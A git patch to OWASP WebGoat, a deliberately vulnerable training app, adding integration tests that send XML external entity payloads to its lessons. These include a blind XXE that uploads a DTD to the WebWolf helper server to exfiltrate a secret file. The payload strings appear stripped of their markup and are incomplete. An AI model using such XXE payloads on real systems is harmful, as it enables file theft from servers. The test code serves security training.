From ec236a4ff527b92a9bf75d44f2e897359180d3db Mon Sep 17 00:00:00 2001 From: Rene Zubcevic Date: Wed, 18 Sep 2019 14:48:34 +0200 Subject: [PATCH] First steps in XXE integration tests --- .../resources/application-webgoat.properties | 1 + .../org/owasp/webgoat/IntegrationTest.java | 11 +-- .../test/java/org/owasp/webgoat/XXETest.java | 73 +++++++++++++++++++ .../resources/application-inttest.properties | 6 ++ .../webgoat/plugin/ContentTypeAssignment.java | 2 +- 5 files changed, 87 insertions(+), 6 deletions(-) create mode 100644 webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java create mode 100644 webgoat-integration-tests/src/test/resources/application-inttest.properties diff --git a/webgoat-container/src/main/resources/application-webgoat.properties b/webgoat-container/src/main/resources/application-webgoat.properties index 2346f3f30..76a3107e1 100644 --- a/webgoat-container/src/main/resources/application-webgoat.properties +++ b/webgoat-container/src/main/resources/application-webgoat.properties @@ -12,6 +12,7 @@ server.ssl.key-alias=${WEBGOAT_KEY_ALIAS:goat} server.ssl.enabled=${WEBGOAT_SSLENABLED:false} security.require-ssl=${WEBGOAT_SSLENABLED:false} +hsqldb.port=${WEBGOAT_HSQLPORT:9001} spring.datasource.url=jdbc:hsqldb:hsql://${WEBGOAT_HOST:127.0.0.1}:${WEBGOAT_HSQLPORT:9001}/webgoat spring.jpa.hibernate.ddl-auto=update spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.HSQLDialect diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java index 9114fcad1..d896b1c80 100644 --- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java @@ -21,12 +21,11 @@ import static io.restassured.RestAssured.given; public abstract class IntegrationTest { - protected static int WG_PORT = 8080; + protected static int WG_PORT = 8081; protected static int WW_PORT = 9090; private static String WEBGOAT_URL = "http://127.0.0.1:" + WG_PORT + "/WebGoat/"; private static String WEBWOLF_URL = "http://127.0.0.1:" + WW_PORT + "/"; - //This also allows to test the application with HTTPS when outside testing option is used protected static RestAssuredConfig restConfig = RestAssuredConfig.newConfig().sslConfig(new SSLConfig().relaxedHTTPSValidation()); @@ -41,16 +40,18 @@ public abstract class IntegrationTest { @BeforeClass public static void beforeAll() { - if (!started) { + + if (!started) { started = true; if (!isAlreadyRunning(WG_PORT)) { SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class) - .properties(Map.of("spring.config.name", "application-webgoat", "WEBGOAT_PORT", WG_PORT)); + .properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_PORT", WG_PORT)); wgs.run(); + } if (!isAlreadyRunning(WW_PORT)) { SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class) - .properties(Map.of("spring.config.name", "application-webwolf", "WEBWOLF_PORT", WW_PORT)); + .properties(Map.of("spring.config.name", "application-webwolf,application-inttest", "WEBWOLF_PORT", WW_PORT)); wws.run(); } } diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java new file mode 100644 index 000000000..ab6e3350c --- /dev/null +++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java @@ -0,0 +1,73 @@ +package org.owasp.webgoat; + +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Path; +import java.nio.file.Paths; + +import org.hamcrest.CoreMatchers; +import org.junit.Assert; +import org.junit.Test; + +import io.restassured.RestAssured; +import io.restassured.http.ContentType; + +public class XXETest extends IntegrationTest { + + private static final String xxe3 = "]>&xxe;test"; + private static final String xxe4 = "]>&xxe;test"; + private static final String dtd7 = "\">%all;"; + private static final String xxe7 = "%remote;]>test&send;"; + + private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat"); + private String webwolfFileDir = System.getProperty("user.dir").concat("/target/webwolf-fileserver"); + + + @Test + public void runTests() throws IOException { + startLesson("XXE"); + + checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true); + checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true); + Path webWolfFilePath = Paths.get(webwolfFileDir); + if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) { + System.out.println("delete file"); + Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd"))); + } + String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt"); + String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile); + System.out.println(dtd7String); + RestAssured.given() + .when() + .config(restConfig) + .cookie("WEBWOLFSESSION", getWebWolfCookie()) + .multiPart("file", "blind.dtd", dtd7String.getBytes()) + .post(webWolfUrl("/WebWolf/fileupload")) + .then() + .extract().response().getBody().asString(); + + + String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser()); + System.out.println(xxe7String); + checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false ); + + //checkResults("/XXE/"); + + } + + public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) { + Assert.assertThat( + RestAssured.given() + .when() + .config(restConfig) + .contentType(contentType) + .cookie("JSESSIONID", getWebGoatCookie()) + .body(body) + .post(url) + .then() + .log().all() + .statusCode(200) + .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult)); + } + +} diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties new file mode 100644 index 000000000..9c388c7ca --- /dev/null +++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties @@ -0,0 +1,6 @@ +webgoat.user.directory=${user.dir}/target/.webgoat +webgoat.server.directory=${user.dir}/target/.webgoat + +webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver + +spring.jpa.hibernate.ddl-auto=create-drop \ No newline at end of file diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java index 4cda99dd3..d89d17519 100644 --- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java +++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/ContentTypeAssignment.java @@ -67,7 +67,7 @@ public class ContentTypeAssignment extends AssignmentEndpoint { attackResult = failed().feedback("xxe.content.type.feedback.json").build(); } - if (MediaType.APPLICATION_XML_VALUE.equals(contentType)) { + if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) { String error = ""; try { Comment comment = comments.parseXml(commentStr);